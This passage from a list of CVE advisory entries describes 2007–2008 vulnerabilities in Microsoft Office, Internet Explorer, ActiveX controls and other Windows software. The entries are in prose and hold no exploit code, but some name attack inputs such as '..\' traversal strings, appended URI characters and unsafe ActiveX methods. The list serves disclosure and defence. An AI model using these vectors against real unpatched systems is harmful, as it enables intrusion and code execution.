arbitrary code via a PowerPoint file with a malformed picture index that triggers memory corruption, related to handling of CString objects, aka "Memory Allocation Vulnerability." [CVE-2008-0119] Unspecified vulnerability in Microsoft Publisher in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 SP1 and earlier allows remote attackers to execute arbitrary code via a Publisher file with crafted object header data that triggers memory corruption, aka "Publisher Object Handler Validation Vulnerability." [CVE-2008-0118] Unspecified vulnerability in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, Excel Viewer 2003 up to SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption from an "allocation error," aka "Microsoft Office Memory Corruption Vulnerability." [CVE-2008-0117] Unspecified vulnerability in Microsoft Excel 2000 SP3 and 2002 SP2, and Office 2004 and 2008 for Mac, allows user-assisted remote attackers to execute arbitrary code via crafted conditional formatting values, aka "Excel Conditional Formatting Vulnerability." [CVE-2008-0116] Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, Compatibility Pack, and Office 2004 and 2008 for Mac allows user-assisted remote attackers to execute arbitrary code via malformed tags in rich text, aka "Excel Rich Text Validation Vulnerability." [CVE-2008-0115] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via malformed formulas, aka "Excel Formula Parsing Vulnerability." [CVE-2008-0114] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via crafted Style records that trigger memory corruption. [CVE-2008-0113] Unspecified vulnerability in Microsoft Office Excel Viewer 2003 up to SP3 allows user-assisted remote attackers to execute arbitrary code via an Excel document with malformed cell comments that trigger memory corruption from an "allocation error," aka "Microsoft Office Cell Parsing Memory Corruption Vulnerability." [CVE-2008-0112] Unspecified vulnerability in Microsoft Excel 2000 SP3, and Office for Mac 2004 and 2008 allows user-assisted remote attackers to execute arbitrary code via a crafted .SLK file that is not properly handled when importing the file, aka "Excel File Import Vulnerability." [CVE-2008-0111] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted data validation records, aka "Excel Data Validation Record Vulnerability." [CVE-2008-0110] Unspecified vulnerability in Microsoft Outlook in Office 2000 SP3, XP SP3, 2003 SP2 and Sp3, and Office System allows user-assisted remote attackers to execute arbitrary code via a crafted mailto URI. [CVE-2008-0109] Word in Microsoft Office 2000 SP3, XP SP3, Office 2003 SP2, and Office Word Viewer 2003 allows remote attackers to execute arbitrary code via crafted fields within the File Information Block (FIB) of a Word file, which triggers length calculation errors and memory corruption. [CVE-2008-0108] Stack-based buffer overflow in wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted field lengths, aka "Microsoft Works File Converter Field Length Vulnerability." [CVE-2008-0106] Buffer overflow in Microsoft SQL Server 2005 SP1 and SP2, and 2005 Express Edition SP1 and SP2, allows remote authenticated users to execute arbitrary code via a crafted insert statement. [CVE-2008-0105] Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section header index table information, aka "Microsoft Works File Converter Index Table Vulnerability." [CVE-2008-0104] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, aka "Publisher Memory Corruption Vulnerability." [CVE-2008-0103] Unspecified vulnerability in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Office document that contains a malformed object, related to a "memory handling error," aka "Microsoft Office Execution Jump Vulnerability." [CVE-2008-0102] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, related to invalid "memory values," aka "Publisher Invalid Memory Reference Vulnerability." [CVE-2008-0086] Buffer overflow in the convert function in Microsoft SQL Server 2000 SP4, 2000 Desktop Engine (MSDE 2000) SP4, and 2000 Desktop Engine (WMSDE) allows remote authenticated users to execute arbitrary code via a crafted SQL expression. [CVE-2008-0082] An ActiveX control (Messenger.UIAutomation.1) in Windows Messenger 4.7 and 5.1 is marked as safe-for-scripting, which allows remote attackers to control the Messenger application, and "change state," obtain contact information, and establish audio or video connections without notification via unknown vectors. [CVE-2008-0081] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted macros, aka "Macro Validation Vulnerability," a different vulnerability than CVE-2007-3490. [CVE-2008-0078] Unspecified vulnerability in an ActiveX control (dxtmsft.dll) in Microsoft Internet Explorer 5.01, 6 SP1 and SP2, and 7 allows remote attackers to execute arbitrary code via a crafted image, aka "Argument Handling Memory Corruption Vulnerability." [CVE-2008-0077] Use-after-free vulnerability in Microsoft Internet Explorer 6 SP1, 6 SP2, and and 7 allows remote attackers to execute arbitrary code by assigning malformed values to certain properties, as demonstrated using the by property of an animateMotion SVG element, aka "Property Memory Corruption Vulnerability." [CVE-2008-0076] Unspecified vulnerability in Microsoft Internet Explorer 5.01, 6 SP1 and SP2, and 7 allows remote attackers to execute arbitrary code via crafted HTML layout combinations, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-0075] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 through 6.0 allows remote attackers to execute arbitrary code via crafted inputs to ASP pages. [CVE-2008-0074] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows local users to gain privileges via unknown vectors related to file change notifications in the TPRoot, NNTPFile\Root, or WWWRoot folders. [CVE-2008-0064] Stack-based buffer overflow in Pierre-emmanuel Gougelet (1) XnView 1.91 and 1.92, (2) NConvert 4.85, and (3) libgfl280.dll in GFL SDK 2.870 for Windows allows user-assisted remote attackers to execute arbitrary code via a crafted Radiance RGBE (.hdr) file. [CVE-2008-0011] Microsoft DirectX 8.1 through 9.0c, and DirectX on Microsoft XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, does not properly perform MJPEG error checking, which allows remote attackers to execute arbitrary code via a crafted MJPEG stream in a (1) AVI or (2) ASF file, aka the "MJPEG Decoder Vulnerability." [CVE-2007-6724] Vidalia bundle before 0.1.2.18, when running on Windows, installs Privoxy with a configuration file (config.txt or config) that contains an insecure enable-remote-http-toggle setting, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6723] TorK before 0.22, when running on Windows and Mac OS X, installs Privoxy with a configuration file (config.txt or config) that contains insecure (1) enable-remote-toggle and (2) enable-edit-actions settings, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6722] Vidalia bundle before 0.1.2.18, when running on Windows and Mac OS X, installs Privoxy with a configuration file (config.txt or config) that contains insecure (1) enable-remote-toggle and (2) enable-edit-actions settings, which allows remote attackers to bypass intended access restrictions and modify configuration. [CVE-2007-6705] The WebSphere MQ XA 5.3 before FP13 and 6.0.x before 6.0.2.1 client for Windows, when running in an MTS or a COM+ environment, grants the PROCESS_DUP_HANDLE privilege to the Everyone group upon connection to a queue manager, which allows local users to duplicate an arbitrary handle and possibly hijack an arbitrary process. [CVE-2007-6701] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP4 for Windows allow remote attackers to execute arbitrary code via long arguments to multiple unspecified RPC functions, aka Novell bug 287919, a different vulnerability than CVE-2007-2954. [CVE-2007-6571] Cross-site scripting (XSS) vulnerability in Sun Java System Web Proxy Server 3.6 before SP11 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka BugID 6611356. [CVE-2007-6534] Multiple unspecified vulnerabilities in Microsoft Office Publisher allow user-assisted remote attackers to cause a denial of service (application crash) via a crafted PUB file, possibly involving wordart. [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive. [CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code. [CVE-2007-6471] Incomplete blacklist vulnerability in main.php in phPay 2.02.01 on Windows allows remote attackers to conduct directory traversal attacks and include and execute arbitrary local files via a ..\ (dot dot backslash) in the config parameter. [CVE-2007-6423] * DISPUTED Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue. [CVE-2007-6405] Sergey Lyubka Simple HTTPD (shttpd) 1.38 and earlier on Windows allows remote attackers to download arbitrary CGI programs or scripts via a URI with an appended (1) '+' character, (2) '.' character, (3) %2e sequence (hex-encoded dot), or (4) hex-encoded character greater than 0x7f. NOTE: the %20 vector is already covered by CVE-2007-3407. [CVE-2007-6404] Directory traversal vulnerability in Sergey Lyubka Simple HTTPD (shttpd) 1.38 and earlier on Windows allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in the URI. [CVE-2007-6357] Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access Database (.mdb) file. NOTE: due to the lack of details as of 20071210, it is not clear whether this issue is the same as CVE-2007-6026 or CVE-2005-0944. [CVE-2007-6349] P4Webs.exe in Perforce P4Web 2006.2 and earlier, when running on Windows, allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with an empty body and a Content-Length greater than 0. [CVE-2007-6334] Ingres 2.5 and 2.6 on Windows, as used in multiple CA products and possibly other products, assigns the privileges and identity of users to be the same as the first user, which allows remote attackers to gain privileges. [CVE-2007-6331] Absolute path traversal vulnerability in the HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier allows remote attackers to execute arbitrary programs via the first argument to the LaunchApp method. NOTE: only a user-assisted attack is possible on Windows Vista. [CVE-2007-6329] Microsoft Office 2007 12.0.6015.5000 and MSO 12.0.6017.5000 do not sign the metadata of Office Open XML (OOXML) documents, which makes it easier for remote attackers to modify Dublin Core metadata fields, as demonstrated by the (1) LastModifiedBy and (2) creator fields in docProps/core.xml in the OOXML ZIP container. [CVE-2007-6326] Sergey Lyubka Simple HTTPD (shttpd) 1.3 on Windows allows remote attackers to cause a denial of service via a request that includes an MS-DOS device name, as demonstrated by the /aux URI. [CVE-2007-6255] Buffer overflow in the Microsoft HeartbeatCtl ActiveX control in HRTBEAT.OCX allows remote attackers to execute arbitrary code via the Host argument to an unspecified method. [CVE-2007-6238] Unspecified vulnerability in Apple QuickTime 7.2 on Windows XP allows remote attackers to execute arbitrary code via unknown attack vectors, probably a different vulnerability than CVE-2007-6166. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release advisories with actionable information. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. However, the organization has stated that this is different than CVE-2007-6166. [CVE-2007-6227] QEMU 0.9.0 allows local users of a Windows XP SP2 guest operating system to overwrite the TranslationBlock (code_gen_buffer) buffer, and probably have unspecified other impacts related to an "overflow," via certain Windows executable programs, as demonstrated by qemu-dos.com. [CVE-2007-6166] Stack-based buffer overflow in Apple QuickTime before 7.3.1, as used in QuickTime Player on Windows XP and Safari on Mac OS X, allows remote Real Time Streaming Protocol (RTSP) servers to execute arbitrary code via an RTSP response with a long Content-Type header. [CVE-2007-6146] Hitachi JP1/File Transmission Server/FTP 01-00 through 08-10-02 on Windows might allow remote attackers to cause a denial of service (service stop) via a "specific file" argument to an FTP command. [CVE-2007-6081] AdventNet EventLog Analyzer build 4030 for Windows, and possibly other versions and platforms, installs a mysql instance with a default "root" account without a password, which allows remote attackers to gain privileges and modify logs. [CVE-2007-6026] Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944. [CVE-2007-6017] The PVATLCalendar.PVCalendar.1 ActiveX control in pvcalendar.ocx in the scheduler component in the Media Server in Symantec Backup Exec for Windows Server (BEWS) 11d 11.0.6235 and 11.0.7170, and 12.0 12.0.1364, exposes the unsafe Save method, which allows remote attackers to cause a denial of service (browser crash), or create or overwrite arbitrary files, via string values of the (1) _DOWText0, (2) _DOWText1, (3) _DOWText2, (4) _DOWText3, (5) _DOWText4, (6) _DOWText5, (7) _DOWText6, (8) _MonthText0, (9) _MonthText1, (10) _MonthText2, (11) _MonthText3, (12) _MonthText4, (13) _MonthText5, (14) _MonthText6, (15) _MonthText7, (16) _MonthText8, (17) _MonthText9, (18) _MonthText10, and (19) _MonthText11 properties. NOTE: the vendor states "Authenticated user involvement required," but authentication is not needed to attack a client machine that loads this control. [CVE-2007-6016] Multiple stack-based buffer overflows in the PVATLCalendar.PVCalendar.1 ActiveX control in pvcalendar.ocx in the scheduler component in the Media Server in Symantec Backup Exec for Windows Server (BEWS) 11d 11.0.6235 and 11.0.7170, and 12.0 12.0.1364, allow remote attackers to execute arbitrary code via a long (1) _DOWText0, (2) _DOWText1, (3) _DOWText2, (4) _DOWText3, (5) _DOWText4, (6) _DOWText5, (7) _DOWText6, (8) _MonthText0, (9) _MonthText1, (10) _MonthText2, (11) _MonthText3, (12) _MonthText4, (13) _MonthText5, (14) _MonthText6, (15) _MonthText7, (16) _MonthText8, (17) _MonthText9, (18) _MonthText10, or (19) _MonthText11 property value when executing the Save method. NOTE: the vendor states "Authenticated user involvement required," but authentication is not needed to attack a client machine that loads this control. [CVE-2007-5957] Unspecified vulnerability in IBM Informix Dynamic Server (IDS) 10.00.TC3TL and 11.10.TB4TL on Windows allows attackers to cause a denial of service (application crash) via unspecified SQ_ONASSIST requests. [CVE-2007-5861] Unspecified vulnerability in Spotlight in Apple Mac OS X 10.4.11 allows user-assisted attackers to cause a denial of service (application termination) or execute arbitrary code via a crafted .XLS file that triggers memory corruption in the Microsoft Office Spotlight Importer. [CVE-2007-5667] NWFILTER.SYS in Novell Client 4.91 SP 1 through SP 4 for Windows 2000, XP, and Server 2003 makes the \.\nwfilter device available for arbitrary user-mode input via METHOD_NEITHER IOCTLs, which allows local users to gain privileges by passing a kernel address as an argument and overwriting kernel memory locations. [CVE-2007-5653] The Component Object Model (COM) functions in PHP 5.x on Windows do not follow safe_mode and disable_functions restrictions, which allows context-dependent attackers to bypass intended limitations, as demonstrated by executing objects with the kill bit set in the corresponding ActiveX control Compatibility Flags, executing programs via a function in compatUI.dll, invoking wscript.shell via wscript.exe, invoking Scripting.FileSystemObject via wshom.ocx, and adding users via a function in shgina.dll, related to the com_load_typelib function. [CVE-2007-5636] Buffer overflow in the Nortel UNIStim IP Softphone 2050 allows remote attackers to cause a denial of service (application abort) and possibly execute arbitrary code via a flood of invalid characters to the RTCP port (5678/udp) that triggers a Windows error message, aka "extraneous messaging." [CVE-2007-5618] Unquoted Windows search path vulnerability in the Authorization and other services in VMware Player 1.0.x before 1.0.5 and 2.0 before 2.0.1, VMware Server before 1.0.4, and Workstation 5.x before 5.5.5 and 6.x before 6.0.1 might allow local users to gain privileges via malicious programs. [CVE-2007-5580] Buffer overflow in a certain driver in Cisco Security Agent 4.5.1 before 4.5.1.672, 5.0 before 5.0.0.225, 5.1 before 5.1.0.106, and 5.2 before 5.2.0.238 on Windows allows remote attackers to execute arbitrary code via a crafted SMB packet in a TCP session on port (1) 139 or (2) 445. [CVE-2007-5493] The SMS handler for Windows Mobile 2005 Pocket PC Phone edition allows attackers to hide the sender field of an SMS message via a malformed WAP PUSH message that causes the PDU to be incorrectly decoded. [CVE-2007-5473] StaticFileHandler.cs in System.Web in Mono before 1.2.5.2, when running on Windows, allows remote attackers to obtain source code of sensitive files via a request containing a trailing (1) space or (2) dot, which is not properly handled by XSP. [CVE-2007-5470] Microsoft Expression Media stores the catalog password in cleartext in the catalog IVC file, which allows local users to obtain sensitive information and gain access to the catalog by reading the IVC file. [CVE-2007-5456] Microsoft Internet Explorer 7 and earlier allows remote attackers to bypass the "File Download - Security Warning" dialog box and download arbitrary .exe files by placing a '?' (question mark) followed by a non-.exe filename after the .exe filename, as demonstrated by (1) .txt, (2) .cda, (3) .log, (4) .dif, (5) .sol, (6) .htt, (7) .itpc, (8) .itms, (9) .dvr-ms, (10) .dib, (11) .asf, (12) .tif, and unspecified other extensions, a different issue than CVE-2004-1331. NOTE: this issue might not cross privilege boundaries, although it does bypass an intended protection mechanism. [CVE-2007-5355] The Web Proxy Auto-Discovery (WPAD) feature in Microsoft Internet Explorer 6 and 7, when a primary DNS suffix with three or more components is configured, resolves an unqualified wpad hostname in a second-level domain outside this configured DNS domain, which allows remote WPAD servers to conduct man-in-the-middle (MITM) attacks. [CVE-2007-5347] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via "unexpected method calls to HTML objects," aka "DHTML Object Memory Corruption Vulnerability." [CVE-2007-5344] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via a crafted website using Javascript that creates, modifies, deletes, and accesses document objects using the tags property, which triggers heap corruption, related to uninitialized or deleted objects, a different issue than CVE-2007-3902 and CVE-2007-3903, and a variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-5322] Insecure method vulnerability in the FPOLE.OCX 6.0.8450.0 ActiveX control in Microsoft Visual FoxPro 6.0 allows remote attackers to execute arbitrary programs by specifying them as an argument to the FoxDoCmd function. [CVE-2007-5302] Multiple cross-site scripting (XSS) vulnerabilities in HP System Management Homepage (SMH) in HP-UX B.11.11, B.11.23, and B.11.31, and SMH before 2.1.10 for Linux and Windows, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5277] Microsoft Internet Explorer 6 drops DNS pins based on failed connections to irrelevant TCP ports, which makes it easier for remote attackers to conduct DNS rebinding attacks, as demonstrated by a port 81 URL in an IMG SRC, when the DNS pin had been established for a session on port 80, a different issue than CVE-2006-4560. [CVE-2007-5250] The Windows dedicated server for the Unreal engine, as used by America's Army and America's Army Special Forces 2.8.2 and earlier, when Punkbuster (PB) is enabled, allows remote attackers to cause a denial of service (server hang) via packets containing 0x07 characters or other unspecified invalid characters. NOTE: this issue may overlap CVE-2007-4443. NOTE: this issue might be in Punkbuster itself, but there are insufficient details to be certain. [CVE-2007-5236] Java Web Start in Sun JDK and JRE 5.0 Update 12 and earlier, and SDK and JRE 1.4.2_15 and earlier, on Windows does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to read local files via an untrusted application. [CVE-2007-5169] Stack-based buffer overflow in MAIPM6.dll in Adobe PageMaker 7.0.1 and 7.0.2 on Windows allows user-assisted remote attackers to execute arbitrary code via a long font name in a .PMD file. [CVE-2007-5158] The focus handling for the onkeydown event in Microsoft Internet Explorer 6.0 allows remote attackers to change field focus and copy keystrokes via a certain use of a JavaScript htmlFor attribute, as demonstrated by changing focus from a textarea to a file upload field, a related issue to CVE-2007-3511. [CVE-2007-5144] Buffer overflow in the GDI engine in Windows Live Messenger, as used for Windows MSN Live 8.1, allows user-assisted remote attackers to cause a denial of service (application crash or system crash) and possibly execute arbitrary code by placing a malformed file in a new folder under the Sharing Folders path, and triggering a synchronize operation through the Windows MSN Live online service, possibly related to extended file attributes and possibly related to an incomplete fix for MS07-046, as demonstrated by a (1) .jpg, (2) .gif, (3) .wmf, (4) .doc, or (5) .ico file. [CVE-2007-5143] F-Secure Anti-Virus for Windows Servers 7.0 64-bit edition allows local users to bypass virus scanning by using the system32 directory to store a crafted (1) archive or (2) packed executable. NOTE: in many environments, this does not cross privilege boundaries because any process able to write to system32 could also shut off F-Secure Anti-Virus. [CVE-2007-5128] SimpNews 2.41.03 on Windows, when PHP before 5.0.0 is used, allows remote attackers to obtain sensitive information via an certain link_date parameter to events.php, which reveals the path in an error message due to an unsupported argument type for the mktime function on Windows. [CVE-2007-5126] Unspecified vulnerability in the client in Symantec Veritas Backup Exec for Windows Servers 11d has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-5090] Unspecified vulnerability in IBM Rational ClearQuest (CQ), when a Microsoft SQL Server or an IBM DB2 database is used, allows attackers to corrupt data via unspecified vectors. [CVE-2007-5080] Integer overflow in RealNetworks RealPlayer 10 and 10.5, RealOne Player 1, and RealPlayer Enterprise for Windows allows remote attackers to execute arbitrary code via a crafted Lyrics3 2.00 tag in an MP3 file, resulting in a heap-based buffer overflow. [CVE-2007-5066] Unspecified vulnerability in Webmin before 1.370 on Windows allows remote authenticated users to execute arbitrary commands via a crafted URL. [CVE-2007-5023] Unquoted Windows search path vulnerability in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075, and Server before 1.0.4 Build 56528 allows local users to gain privileges via unspecified vectors, possibly involving a malicious "program.exe" file in the C: folder. [CVE-2007-5020] Unspecified vulnerability in Adobe Acrobat and Reader 8.1 on Windows allows remote attackers to execute arbitrary code via a crafted PDF file, related to the mailto: option and Internet Explorer 7 on Windows XP. NOTE: this information is based upon a vague pre-advisory by a reliable researcher. [CVE-2007-4991] The SOCKS4 Proxy in Microsoft Internet Security and Acceleration (ISA) Server 2004 SP1 and SP2 allows remote attackers to obtain potentially sensitive information (the destination IP address of another user's session) via an empty packet. [CVE-2007-4972] RegMon 7.04 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks to the (1) NtCreateKey and (2) NtOpenKey Windows Native API functions. [CVE-2007-4971] ProSecurity 1.40 Beta 2 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks for Windows Native API functions including (1) NtCreateKey, (2) NtDeleteFile, (3) NtLoadDriver, (4) NtOpenSection, and (5) NtSetSystemTime. [CVE-2007-4970] ProcessGuard 3.410 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via kernel SSDT hooks for Windows Native API functions including (1) NtCreateFile, (2) NtCreateKey, (3) NtDeleteValueKey, (4) NtOpenFile, (5) NtOpenKey, and (6) NtSetValueKey. [CVE-2007-4969] Process Monitor 1.22 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via unspecified kernel SSDT hooks for Windows Native API functions including (1) NtCreateKey, (2) NtDeleteValueKey, (3) NtLoadKey, (4) NtOpenKey, (5) NtQueryValueKey, (6) NtSetValueKey, and (7) NtUnloadKey. [CVE-2007-4967] Online Armor Personal Firewall 2.0.1.215 does not properly validate certain parameters to System Service Descriptor Table (SSDT) function handlers, which allows local users to cause a denial of service (crash) and possibly gain privileges via unspecified kernel SSDT hooks for Windows Native API functions including (1) NtAllocateVirtualMemory, (2) NtConnectPort, (3) NtCreateFile, (4) NtCreateKey, (5) NtCreatePort, (6) NtDeleteFile, (7) NtDeleteValueKey, (8) NtLoadKey, (9) NtOpenFile, (10) NtOpenProcess, (11) NtOpenThread, (12) NtResumeThread, (13) NtSetContextThread, (14) NtSetValueKey, (15) NtSuspendProcess, (16) NtSuspendThread, and (17) NtTerminateThread. [CVE-2007-4931] HP System Management Homepage (SMH) for Windows, when used in conjunction with HP Version Control Agent or Version Control Repository Manager, leaves old OpenSSL software active after an OpenSSL update, which has unknown impact and attack vectors, probably related to previous vulnerabilities for OpenSSL. [CVE-2007-4916] Heap-based buffer overflow in the FileFind::FindFile method in (1) MFC42.dll, (2) MFC42u.dll, (3) MFC71.dll, and (4) MFC71u.dll in Microsoft Foundation Class (MFC) Library 8.0, as used by the ListFiles method in hpqutil.dll 2.0.0.138 in Hewlett-Packard (HP) All-in-One and Photo & Imaging Gallery 1.1 and probably other products, allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long first argument. [CVE-2007-4892] Multiple SQL injection vulnerabilities in SWSoft Plesk 7.6.1, 8.1.0, 8.1.1, and 8.2.0 for Windows allow remote attackers to execute arbitrary SQL commands via a PLESKSESSID cookie to (1) login.php3 or (2) auth.php3. [CVE-2007-4891] A certain ActiveX control in PDWizard.ocx 6.0.0.9782 and earlier in Microsoft Visual Studio 6.0 exposes dangerous (1) StartProcess, (2) SyncShell, (3) SaveAs, (4) CABDefaultURL, (5) CABFileName, and (6) CABRunFile methods, which allows remote attackers to execute arbitrary programs and have other impacts, as demonstrated using absolute pathnames in arguments to StartProcess and SyncShell. [CVE-2007-4890] Absolute directory traversal vulnerability in a certain ActiveX control in the VB To VSI Support Library (VBTOVSI.DLL) 1.0.0.0 in Microsoft Visual Studio 6.0 allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SaveAs method. NOTE: contents can be copied from local files via the Load method. [CVE-2007-4848] Microsoft Internet Explorer 4.0 through 7 allows remote attackers to determine the existence of local files that have associated images via a res:// URI in the src property of a JavaScript Image object, as demonstrated by the URI for a bitmap image resource within a (1) .exe or (2) .dll file. [CVE-2007-4841] Mozilla Firefox before 2.0.0.8, Thunderbird before 2.0.0.8, and SeaMonkey before 1.1.5 allows remote attackers to execute arbitrary commands via a (1) mailto, (2) nntp, (3) news, or (4) snews URI with invalid "%" encoding, related to improper file type handling on Windows XP with Internet Explorer 7 installed, a variant of CVE-2007-3845. [CVE-2007-4814] Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method. [CVE-2007-4790] Stack-based buffer overflow in certain ActiveX controls in (1) FPOLE.OCX 6.0.8450.0 and (2) Foxtlib.ocx, as used in the Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library [CVE-2007-4776] Buffer overflow in Microsoft Visual Basic 6.0 and Enterprise Edition 6.0 SP6 allows user-assisted remote attackers to execute arbitrary code via a Visual Basic project (vbp) file containing a long Reference line, related to VBP_Open and OLE. NOTE: there are limited usage scenarios under which this would be a vulnerability. [CVE-2007-4698] Apple Safari 3 before Beta Update 3.0.4 on Windows, and Mac OS X 10.4 through 10.4.10, allows remote attackers to conduct cross-site scripting (XSS) attacks by causing JavaScript events to be associated with the wrong frame. [CVE-2007-4692] The tabbed browsing feature in Apple Safari 3 before Beta Update 3.0.4 on Windows, and Mac OS X 10.4 through 10.4.10, allows remote attackers to spoof HTTP authentication for other sites and possibly conduct phishing attacks by causing an authentication sheet to be displayed for a tab that is not active, which makes it appear as if it is associated with the active tab. [CVE-2007-4673] Argument injection vulnerability in Apple QuickTime 7.2 for Windows XP SP2 and Vista allows remote attackers to execute arbitrary commands via a URL in the qtnext field in a crafted QTL file. NOTE: this issue may be related to CVE-2006-4965 or CVE-2007-5045. [CVE-2007-4671] Unspecified vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to "alter or access" HTTPS content via an HTTP session with a crafted web page that causes Javascript to be applied to HTTPS pages from the same domain. [CVE-2007-4599] Stack-based buffer overflow in RealNetworks RealPlayer 10 and possibly 10.5, and RealOne Player 1 and 2, for Windows allows remote attackers to execute arbitrary code via a crafted playlist (PLS) file. [CVE-2007-4578] Sophos Anti-Virus for Windows and for Unix/Linux before 2.48.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UPX packed file, resulting from an "integer cast around". NOTE: as of 20070828, the vendor says this is a DoS and the researcher says this allows code execution, but the researcher is reliable. [CVE-2007-4516] The Volume Manager Scheduler Service (aka VxSchedService.exe) in Symantec Veritas Storage Foundation 5.0 for Windows allows remote attackers to cause a denial of service (daemon crash or hang) via malformed packets. [CVE-2007-4512] Cross-site scripting (XSS) vulnerability in Sophos Anti-Virus for Windows 6.x before 6.5.8 and 7.x before 7.0.1 allows remote attackers to inject arbitrary web script or HTML via an archive with a file that matches a virus signature and has a crafted filename that is not properly handled by the print function in SavMain.exe. [CVE-2007-4490] Multiple buffer overflows in EarthAgent.exe in Trend Micro ServerProtect 5.58 for Windows before Security Patch 4 allow remote attackers to have an unknown impact via certain RPC function calls to (1) RPCFN_EVENTBACK_DoHotFix or (2) CMD_CHANGE_AGENT_REGISTER_INFO. [CVE-2007-4478] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6.0 and 7 allows user-assisted remote attackers to inject arbitrary web script or HTML in the local zone via a URI, when the document at the associated URL is saved to a local file, which then contains the URI string along with the document's original content. [CVE-2007-4451] The server in Toribash 2.71 and earlier on Windows allows remote attackers to cause a denial of service (continuous beep and server hang) via certain commands that contain many 0x07 or other invalid characters. [CVE-2007-4443] The UCC dedicated server for the Unreal engine, possibly 2003 and 2004, on Windows allows remote attackers to cause a denial of service (continuous beep and server slowdown) via a string containing many 0x07 characters in (1) a request to the images/ directory, (2) the Content-Type field, (3) a HEAD request, and possibly other unspecified vectors. [CVE-2007-4431] Cross-domain vulnerability in Apple Safari for Windows 3.0.3 and earlier 